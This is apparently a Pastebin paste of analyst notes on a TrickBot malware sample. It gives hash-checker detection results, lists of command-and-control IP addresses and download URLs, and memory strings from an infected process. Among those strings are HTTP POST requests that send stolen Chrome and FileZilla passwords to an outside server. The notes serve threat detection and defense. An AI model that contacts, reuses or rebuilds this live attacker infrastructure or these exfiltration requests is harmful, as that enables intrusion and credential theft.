Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Artifacts
- ==========
- | | | | | \ | | | | | | \ \ | | | | \ \ /.)
- | | | | | | | | | | | | | | | | | | | | /)\|
- |_| |_| |_| \_|__|_| |_| |_| _|_|_ |_| |_| // /
- /'" "
- Online Hash Checker for Virustotal and Other Services
- Florian Roth - 0.13.0 April 2019
- [+] Found results CSV from previous run: check-results_temp.csv
- [+] Appending results to file: check-results_temp.csv
- [ ] Processing e3615fc4b82979.bat ...
- [ ] Processing c3b68665a5cb91b32fe4.bat ...
- [ ] Processing Copy of Doc IAAN 17_871 INDV.doc ...
- [ ] Processing AidaLogsRepors.exe ...
- [ ] Processing c233be3634f987bc713a6148.bat ...
- [+] Processing 5 lines ...
- 1 / 5 > Clean
- HASH: c43ebd26c8ca084d5e2c71d58a9a76a791080d3c0101e20631d2a0b922f1b039 COMMENT:e3615fc4b82979.bat
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-03 00:39:24 COMMENTS: 0 USERS: -
- RESULT: 0 / 56
- 2 / 5 > Unknown
- HASH: aa981df19422808f263341cd6229168425078c083723ac965954903368e68c79 COMMENT:c3b68665a5cb91b32fe4.bat
- RESULT: - / -
- 3 / 5 > Suspicious
- HASH: 60c185630ac0713341bf4f3750bacc66505d151508903f519b6152592bbecb12 COMMENT:Copy of Doc IAAN 17_871 INDV.doc
- VIRUS: TrendMicro: HEUR_VBA.O2
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-04 19:34:26 COMMENTS: 0 USERS: -
- RESULT: 6 / 60
- 4 / 5 > Malicious
- HASH: 89ed8f11cd5aca84c8eaaeb7120aea6392d22757bce542f827b0c4861da09661 COMMENT:AidaLogsRepors.exe
- VIRUS: Kaspersky: UDS:DangerousObject.Multi.Generic / CrowdStrike: win/malicious_confidence_80% (D)
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-04 19:43:40 COMMENTS: 0 USERS: -
- RESULT: 13 / 70
- 5 / 5 > Unknown
- HASH: 29e45959c675394ca061b9adcab09c49682ee44a657c25494c00639f8d5c78c2 COMMENT:c233be3634f987bc713a6148.bat
- RESULT: - / -
- -----
- | | | | | \ | | | | | | \ \ | | | | \ \ /.)
- | | | | | | | | | | | | | | | | | | | | /)\|
- |_| |_| |_| \_|__|_| |_| |_| _|_|_ |_| |_| // /
- /'" "
- Online Hash Checker for Virustotal and Other Services
- Florian Roth - 0.13.0 April 2019
- [+] Writing results to new file: check-results_MsCloud.csv
- [ ] Processing 2019-09-04-trickbot/MsCloud/AidaNqguTerqtu.exe ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/settings.ini ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/mailsearcher64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/importDll64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/systeminfo64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/networkDll64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/psfin64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/pwgrab64 ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/psfin64_configs/dpost ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/pwgrab64_configs/dpost ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/mailsearcher64_configs/mailconf ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dinj ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/sinj ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dpost ...
- [ ] Processing 2019-09-04-trickbot/MsCloud/data/networkDll64_configs/dpost ...
- [+] Processing 16 lines ...
- 1 / 16 > Malicious
- HASH: 89ed8f11cd5aca84c8eaaeb7120aea6392d22757bce542f827b0c4861da09661 COMMENT: 2019-09-04-trickbot/MsCloud/AidaNqguTerqtu.exe
- VIRUS: Microsoft: Trojan:Win32/Zpevdo.A / Kaspersky: Trojan.Win32.Inject.amcbj / McAfee: Artemis!64EBC09F3249 / CrowdStrike: win/malicious_confidence_80% (W) / TrendMicro: TROJ_FRS.VSNW04I19 / ESET-NOD32: a variant of Win32/GenKryptik.DSDJ / Symantec: ML.Attribute.HighConfidence / GData: Win32.Trojan-Spy.TrickBot.DNLMNN
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-05 13:14:12 COMMENTS: 0 USERS: -
- RESULT: 24 / 67
- [!] Sample on CAPE sandbox URL: https://cape.contextis.com/analysis/90022/
- [!] Sample on CAPE sandbox URL: https://cape.contextis.com/analysis/90021/
- 2 / 16 > Unknown
- HASH: 42f15e9c3a5a98d94608d69aacc5790d14345c768e07cba2f6fdc094470a5c4e COMMENT: 2019-09-04-trickbot/MsCloud/settings.ini
- RESULT: - / -
- 3 / 16 > Unknown
- HASH: d390162edc8698fe765bc6ba2cfe772abad55c74259782a2991f3fe5e9955a62 COMMENT: 2019-09-04-trickbot/MsCloud/data/mailsearcher64
- RESULT: - / -
- 4 / 16 > Unknown
- HASH: da9896abed6fca8ca751397adfe6268abbf56114c0f1dd74d041e28dfe0488ad COMMENT: 2019-09-04-trickbot/MsCloud/data/importDll64
- RESULT: - / -
- 5 / 16 > Unknown
- HASH: 8dcfbc19e08942458f83cbc3cfe16b0ede15225860e1516dd2aa132bebd0fbcb COMMENT: 2019-09-04-trickbot/MsCloud/data/systeminfo64
- RESULT: - / -
- 6 / 16 > Unknown
- HASH: 9ba4c3fe3a95a321489bb8238106ea9734a3168822d7fc3f7c2946eea228115c COMMENT: 2019-09-04-trickbot/MsCloud/data/networkDll64
- RESULT: - / -
- 7 / 16 > Unknown
- HASH: 83c45927624559a1609e2d02e98bafe67ac3de3e1ac5ee16255aa3a705569551 COMMENT: 2019-09-04-trickbot/MsCloud/data/psfin64
- RESULT: - / -
- 8 / 16 > Unknown
- HASH: 47d4d32e2dcb832793c439a44cff8da5ef0720961f925ef55ca0c7543c9c3b2e COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64
- RESULT: - / -
- 9 / 16 > Unknown
- HASH: 49660580b1f3b845a8f064095761dad5b96332a27d093965f633c6257706cc83 COMMENT: 2019-09-04-trickbot/MsCloud/data/pwgrab64
- RESULT: - / -
- 10 / 16 > Unknown
- HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/psfin64_configs/dpost
- RESULT: - / -
- 11 / 16 > Unknown
- HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/pwgrab64_configs/dpost
- RESULT: - / -
- 12 / 16 > Unknown
- HASH: e6aa9d48dff040faa558781adc3f04398807d0c8fd275861252886b283c2f627 COMMENT: 2019-09-04-trickbot/MsCloud/data/mailsearcher64_configs/mailconf
- RESULT: - / -
- 13 / 16 > Unknown
- HASH: 7c5bb67e5a1c2b6f8755d8e52bc5983b1551b45738731f69b08f86768d333845 COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dinj
- RESULT: - / -
- 14 / 16 > Unknown
- HASH: c7bf18b05cf9a333fbb1e8e54c55e93e2487a1a8987d0264fd3804c2267b8ebd COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/sinj
- RESULT: - / -
- 15 / 16 > Unknown
- HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/injectDll64_configs/dpost
- RESULT: - / -
- 16 / 16 > Unknown
- HASH: 2d8cfe87c00d2b16fbaa8c0cd46ee12d1a0d6dc2e31d0347957c55986b07aabb COMMENT: 2019-09-04-trickbot/MsCloud/data/networkDll64_configs/dpost
- RESULT: - / -
- IOCs
- =====
- 162.241.218.208 / repgqo.com/Ileo3.bmp
- 116.203.16.95 / ip.anysrc.net
- 200.119.45.140:449 (TCP)
- 194.5.250.115:447 (TCP)
- 170.238.117.187:8082 (POST/TCP)
- 104.168.98.206 (GET /tablone.png)
- 104.168.98.206 (GET /samerton.png)
- Interesting strings from svchost.exe process
- ==============================================
- https://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/psfin/Log/SendReport/
- `E^LL
- wE_Z\
- cE^OK
- 36.89.85.103
- htep
- sche
- yste
- 131.196.184.141:449
- 186.47.40.234:449
- 103.84.238.3:449
- 190.152.4.210:449
- 186.156.52.78:449
- 36.89.85.103:449
- 181.176.160.145:449
- 200.119.45.140:449
- 190.13.190.178:449
- 186.46.63.58:449
- 181.112.159.70:449
- 181.129.93.226:449
- 186.42.226.46:449
- 190.13.160.19:449
- 181.112.159.70:449
- tag><ser
- 202.9.120.79:449
- 8.8.91.4
- 190.109.189.119:449
- <srv>212
- 103.207.1.44:449
- 443</srv
- 190.151.213.140:449
- 42.99.59
- 168.227.229.112:449
- rv>5.101Y
- 186.42.186.202:449
- /srv><srZ
- 190.144.89.82:449
- 13:443</_
- 190.144.89.82:449
- .251.27.P
- 181.129.49.98:449
- ><srv>19U
- 337d
- grab
- 1.37.181K
- 107.174.254.216
- ><srv>14L
- 198.8.91.44
- 149:449<A
- 185.235.130.84
- 186.47.4B
- 212.80.217.69
- v><srv>1G
- 195.123.237.37
- :449</srx
- 37.228.117.217
- 6.160.14}
- 185.142.99.59
- <srv>190~
- 45.141.103.31
- 49</srv>s
- 5.101.51.112
- 9.93.226t
- 185.125.46.53
- rv>190.1i
- 46.30.42.239
- 9</srv><j
- 194.5.250.113
- 89.119:4o
- 93.189.43.168
- 190.151.`
- 148.251.27.76
- 9</srv><e
- 31.202.132.179
- .89.82:449</srv><srv>190.144.89.82:449</107.174.254.216:443
- 185.235.130.84:443
- 212.80.217.69:443
- 195.123.237.37:443
- 37.228.117.217:443
- 185.142.99.59:443
- 45.141.103.31:443
- 5.101.51.112:443
- 185.125.46.53:443
- (R)
- 46.30.42.239:443
- Adap
- 194.5.250.113:443
- ver
- 93.189.43.168:443
- 148.251.27.76:443
- 31.202.132.179:443
- 190.154.203.218:449
- 189.80.134.122:449
- 200.119.45.140:449
- 191.37.181.152:449
- 187.58.56.26:449
- 146.196.122.167:449
- |Intel
- nGWI
- top
- (R)
- ASYC
- ASYC
- ter-
- DNSR
- http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- ENDP
- 190.13.190.178
- HTEP
- SCHE
- ENDP
- 190.13.190.178
- HTEP
- SCHE
- ttps://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/63/psfin/start///
- 0c(
- F?W\
- Microsoft Loopbac
- pter-PEF NDISCAP Lightweight Filter Driver-0000
- viF?W\
- hWAN M
- rt (IPv6)-Npcap Packet Driver (NPCAP)-0000
- pE^\
- ILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/1/0LDjfnxgLgn7BPazR/
- https://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/1/MjQfZIaPCu27inKpPeHmr08nD7/
- oD_CL
- mcconf
- autorun
- module
- name
- 190.154.203.218
- 189.80.134.122
- 200.119.45.140
- 191.37.181.152
- 187.58.56.26
- 146.196.122.167
- 177.103.240.149
- 131.196.184.141
- 186.47.40.234
- 103.84.238.3
- 190.152.4.210
- 186.156.52.78
- 36.89.85.103
- 181.176.160.145
- 200.119.45.140
- 190.13.190.178
- 186.46.63.58
- 181.112.159.70
- 181.129.93.226
- 186.42.226.46
- 190.13.160.19
- 181.112.159.70
- 202.9.120.79
- 190.109.189.119
- 103.207.1.44
- D6`8&`}
- 190.151.213.140
- 168.227.229.112
- 186.42.186.202
- 190.144.89.82
- 190.144.89.82
- 181.129.49.98
- 186.47.82.6
- systeminfo
- GetSystemInfo
- ter
- fc6:*
- pwgrab
- injectDll
- injectDll
- 337d
- HReq
- ZZZZ
- ackage\csilogfile.log
- F3541-96
- injectDll
- pwgrab
- 190.13.190.178
- 190.13.190.178
- pwgrab
- pter
- 169.254.
- settings.ini
- 0.0.0.0
- 0.0.0.0
- [YplaWuvu j]
- riawsvh=YkFv NCH4X URIN R
- 4B4-815D-E56
- Npcap Lo
- 190.13.190.178
- 255.255.
- 36.89.85.103
- 255.255.
- 1234567890
- 255.255.
- -44B4-
- \Devi
- 1234567890
- EF-8
- 9-4c
- 6423337d
- 1A6-A0
- {DC40F
- -E5627
- C34F35
- 479610DF7B39}
- \Device\
- Usc2
- osoft SSL Protoc
- rd|h}[0
- -State1!
- dgits Pty Lt
- "tD"
- o[@p
- S0Q0
- ^
- sS
- -~m//
- l]Kju
- en-US
- 9C3DF2C0B414041BC708E/5/mailconf/
- https://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/5/dinj/
- https://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/5/sinj/
- ltipart/form-data; boundary=------Boundary000B6B57
- bx56k5gep4jz7k4x.onion
- vider
- ltipart/form-data; boundary=------Boundary000B5F9F
- ------Boundary005BF0DD
- Content-Disposition: form-data; name="info"
- Report successfully sent
- --------Boundary005BF0DD--
- ------Boundary005AB456
- Content-Disposition: form-data; name="info"
- Grab_Passwords_Chrome(2)
- --------Boundary005AB456--
- ontent-Type: multipart/form-data; boundary=------Boundary005C1405
- Content-Length: 128
- ttps://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/
- ttps://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/
- ttps://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/
- l!#pnO50u
- ttps://190.13.190.178:449/lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/networkDll/Log/SendReport/
- URIO
- URIO
- ontent-Type: multipart/form-data; boundary=------Boundary005ACBC6
- Content-Length: 132
- ------Boundary000A5DCF
- Content-Disposition: form-data; name="info"
- Successfully sent PASSWORDS to DPost server: FileZilla passwords
- --------Boundary000A5DCF--
- /1/p
- pwgrab64
- PWGRAB~1
- pwgrab64_configs
- SYSTEM~1
- systeminfo64
- moduleconfig
- autoconf
- conf
- period
- nGWIR
- ST /lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/ HTTP/1.1
- Connection: Keep-Alive
- Content-Type: multipart/form-data; boundary=------Boundary005C084D
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36
- Content-Length: 130
- Host: 190.13.190.178:449
- 9
- ST /lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/ HTTP/1.1
- Connection: Keep-Alive
- Content-Type: multipart/form-data; boundary=------Boundary005C1405
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36
- Content-Length: 128
- Host: 190.13.190.178:449
- 9
- ST /lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/ HTTP/1.1
- Connection: Keep-Alive
- Content-Type: multipart/form-data; boundary=------Boundary005ACBC6
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36
- Content-Length: 132
- Host: 190.13.190.178:449
- 449
- ST /lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/networkDll/Log/SendReport/ HTTP/1.1
- Connection: Keep-Alive
- Content-Type: multipart/form-data; boundary=------Boundary005BF0DD
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36
- Content-Length: 129
- Host: 190.13.190.178:449
- tX2Fe$
- ST /lleo3/BILL-PC_W617601.3E5CF7603C89C3DF2C0B414041BC708E/64/pwgrab/DPST/browser/ HTTP/1.1
- Connection: Keep-Alive
- Content-Type: multipart/form-data; boundary=------Boundary005A336E
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36
- Content-Length: 131
- Host: 190.13.190.178:449
- 194.5.250.115:447
- 185.222.202.29:447
- 212.73.150.188:447
- 184.164.142.51:447
- 217.12.210.216:447
- 172.106.131.104:447
- 185.183.99.146:447
- 95.181.198.140:447
- 37.72.168.154:447
- 107.173.160.22:447
- 79.124.49.206:447
- tion S&
- 194.5.250.53:447
- te, Inc.%
- 5.152.210.169:447
- wte Prim
- 66.55.71.112:447
- 193.26.217.140:447
- 185.45.193.76:447
- 194.5.250.115:447
- 185.222.202.29:447
- 212.73.150.188:447
- 184.164.142.51:447
- 217.12.210.216:447
- 172.106.131.104:447
- 185.183.99.146:447
- 95.181.198.140:447
- 37.72.168.154:447
- 107.173.160.22:447
- 79.124.49.206:447
- 194.5.250.53:447
- 5.152.210.169:447
- 66.55.71.112:447
Advertisement
Add Comment
Please, Sign In to add comment